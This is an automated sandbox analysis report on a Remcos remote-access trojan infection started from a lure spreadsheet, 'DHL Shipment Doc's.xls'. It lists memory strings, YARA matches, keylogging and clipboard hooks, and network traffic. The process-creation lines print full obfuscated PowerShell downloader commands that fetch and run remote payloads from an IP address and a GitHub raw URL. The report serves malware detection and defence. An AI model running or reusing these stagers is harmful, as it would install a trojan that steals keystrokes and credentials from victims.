                    Source: RegAsm.exe, 00000016.00000002.458458173.000000000036C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/OK
                    Source: RegAsm.exe, 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                    Source: RegAsm.exe, 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://www.msn.com/advertisement.ad.js
                    Source: RegAsm.exe, 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                    Source: RegAsm.exe, 00000014.00000002.466186728.0000000000143000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.netX
                    Source: bhvED5C.tmp.20.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
                    Source: bhvED5C.tmp.20.drString found in binary or memory: https://contextual.media.net/8/nrrV73987.js
                    Source: bhvED5C.tmp.20.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
                    Source: bhvED5C.tmp.20.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
                    Source: bhvED5C.tmp.20.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
                    Source: powershell.exe, 00000007.00000002.439981649.0000000012331000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000007.00000002.439981649.0000000012331000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000007.00000002.439981649.0000000012331000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: bhvED5C.tmp.20.drString found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
                    Source: bhvED5C.tmp.20.drString found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
                    Source: bhvED5C.tmp.20.drString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
                    Source: bhvED5C.tmp.20.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                    Source: bhvED5C.tmp.20.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                    Source: RegAsm.exeString found in binary or memory: https://login.yahoo.com/config/login
                    Source: powershell.exe, 00000007.00000002.439981649.0000000012331000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: bhvED5C.tmp.20.drString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
                    Source: powershell.exe, 00000020.00000002.486644854.00000000001D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495129914.000000001AD80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.gi
                    Source: powershell.exe, 0000000E.00000002.448752677.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.488158083.0000000002B3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercont
                    Source: powershell.exe, 0000000E.00000002.448752677.0000000002551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.448752677.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.488158083.0000000002B3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.488158083.00000000025A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                    Source: powershell.exe, 00000020.00000002.495129914.000000001ACF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectO
                    Source: powershell.exe, 00000020.00000002.488158083.00000000025A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
                    Source: bhvED5C.tmp.20.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                    Source: mshta.exe, 00000003.00000003.414481683.00000000038E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417458456.00000000038E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.441247952.000000001C9D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.441247952.000000001CA42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.471480072.000000001C4D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.470841965.000000001A788000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.471480072.000000001C4F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466466940.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466466940.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461593714.00000000035A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C1B3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C197000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495129914.000000001AD0F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C181000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                    Source: bhvED5C.tmp.20.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                    Source: mshta.exe, 00000003.00000003.414481683.00000000038E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417458456.00000000038E6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462003839.0000000000482000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465120785.0000000000482000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.465383861.0000000000482000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.463988623.0000000000482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stylite.io/
                    Source: mshta.exe, 00000003.00000003.414481683.00000000038E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417458456.00000000038E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stylite.io/1
                    Source: mshta.exe, 00000003.00000002.417313522.0000000000551000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stylite.io/G
                    Source: mshta.exe, 00000003.00000002.417313522.0000000000551000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stylite.io/K
                    Source: mshta.exe, 0000000F.00000002.466466940.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stylite.io/k
                    Source: RegAsm.exe, 00000010.00000002.848958157.0000000000791000.00000004.00000020.00020000.00000000.sdmp, DHL Shipment Doc's.xls, logs.dat.16.dr, D5230000.0.drString found in binary or memory: https://stylite.io/noDe
                    Source: mshta.exe, 0000000F.00000002.465313984.00000000003FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stylite.io/noDe3
                    Source: mshta.exe, 0000000F.00000003.465037707.000000000357D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.464321262.000000000357C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.464200564.000000000357C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stylite.io/noDeta
                    Source: mshta.exe, 00000003.00000002.417313522.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stylite.io/noDeu
                    Source: mshta.exe, 0000000F.00000002.466466940.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stylite.io/p
                    Source: RegAsm.exe, 00000014.00000002.469694981.00000000022C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                    Source: bhvED5C.tmp.20.drString found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
                    Source: RegAsm.exe, RegAsm.exe, 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: RegAsm.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                    Source: bhvED5C.tmp.20.drString found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49180 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49180
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
                    Source: unknownHTTPS traffic detected: 213.183.76.21:443 -> 192.168.2.22:49165 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 213.183.76.21:443 -> 192.168.2.22:49167 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 213.183.76.22:443 -> 192.168.2.22:49175 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 213.183.76.22:443 -> 192.168.2.22:49176 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,0000000033_2_0040A2F3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0041183A OpenClipboard,GetLastError,20_2_0041183A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,20_2_0040987A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,20_2_004098E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,21_2_00406DFC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,21_2_00406E9F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,22_2_004068B5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,22_2_004072B5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,33_2_004168FC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,33_2_0040B749
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,33_2_0040A41B
                    Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: Yara matchFile source: 14.2.powershell.exe.1239d998.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.1239d998.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.457736519.000000001239D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.486168984.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3228, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3864, type: MEMORYSTR

                    E-Banking Fraud

                    barindex
                    Source: Yara matchFile source: 14.2.powershell.exe.1239d998.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.1239d998.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000010.00000002.849805315.000000000244E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.848958157.0000000000791000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.487528799.0000000000931000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.849173368.00000000007CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.850008611.0000000003AC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.848958157.0000000000775000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.457736519.000000001239D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.486168984.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3228, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 896, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3864, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0041CA73 SystemParametersInfoW,33_2_0041CA73

                    System Summary

                    barindex
                    Source: 14.2.powershell.exe.1239d998.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 14.2.powershell.exe.1239d998.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 14.2.powershell.exe.1239d998.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 33.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 33.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 33.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 14.2.powershell.exe.1239d998.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 14.2.powershell.exe.1239d998.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0000000E.00000002.457736519.000000001239D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000021.00000002.486168984.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000021.00000002.486168984.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000021.00000002.486168984.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 4068, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 3228, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 3228, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                    Source: Process Memory Space: powershell.exe PID: 3228, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 3684, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 3956, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                    Source: Process Memory Space: powershell.exe PID: 3956, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: RegAsm.exe PID: 3864, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: DHL Shipment Doc's.xlsOLE: Microsoft Excel 2007+
                    Source: DHL Shipment Doc's.xlsOLE: Microsoft Excel 2007+
                    Source: D5230000.0.drOLE: Microsoft Excel 2007+
                    Source: D5230000.0.drOLE: Microsoft Excel 2007+
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Newprojectupdatedwithmegreat[1].htaJump to behavior
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzInKyd9JysndScrJ3JsJysnICcrJz0gezB9aHR0cHM6Ly9yYXcuZ2knKyd0JysnaHUnKydidXNlcmNvJysnbnRlbnQuY28nKydtJysnL05vRGV0JysnZScrJ2N0T24vTicrJ29EZXRlYycrJ3RPbi8nKydyZScrJ2YnKydzL2hlYScrJ2RzL21haScrJ24vRGV0YScrJ2hOb3RoLVYnKycudHh0ezB9OycrJyB7JysnMn1iYXNlJysnNjRDb250ZW50ID0gKE5ldy0nKydPYmplY3QnKycgU3lzJysndGVtLk4nKydlJysndCcrJy5XJysnZScrJ2JDbGllbnQpLkRvJysnd24nKydsb2EnKydkJysnU3RyaW5nKHsyJysnfXUnKydybCknKyc7IHsnKycyJysnfScrJ2JpbmFyeUNvbnRlbnQgPSBbJysnUycrJ3knKydzdGVtJysnLkNvJysnbicrJ3YnKydlcnRdOjpGcm8nKydtQmFzZTY0U3QnKydyaW5nKHsnKycyJysnfWJhc2UnKyc2NENvJysnbnQnKydlbnQpOyB7JysnMn1hc3NlJysnbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLkFzcycrJ2VtYmwnKyd5JysnXTo6JysnTG9hZCh7Mn1iaW5hcicrJ3lDbycrJ24nKyd0ZW50KTsgWycrJ2RuJysnbGliLklPLkhvbWVdOjpWQUkoezF9JysndHh0LicrJ1YnKydWQkdGJysnUicrJy83JysnOScrJy8wMi4nKycwMicrJzIuMy4yJysnOTEvJysnLycrJzonKydwdHRoezF9LCcrJyB7JysnMX0nKydkZXNhdCcrJ2l2YWRvezEnKyd9LCB7MX0nKydkJysnZXNhdGknKyd2JysnYWRvezF9LCAnKyd7MScrJ31kZXNhJysndGl2YWRveycrJzF9LCcrJyAnKyd7MX1SZWdBc217MX0sJysnIHsxfXsxfSx7MX17MX0pJykgIC1mW0NIYXJdMzksW0NIYXJdMzQsW0NIYXJdMzYpIHwgJiggJEVOVjpDT21zUEVDWzQsMjYsMjVdLUpPSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"
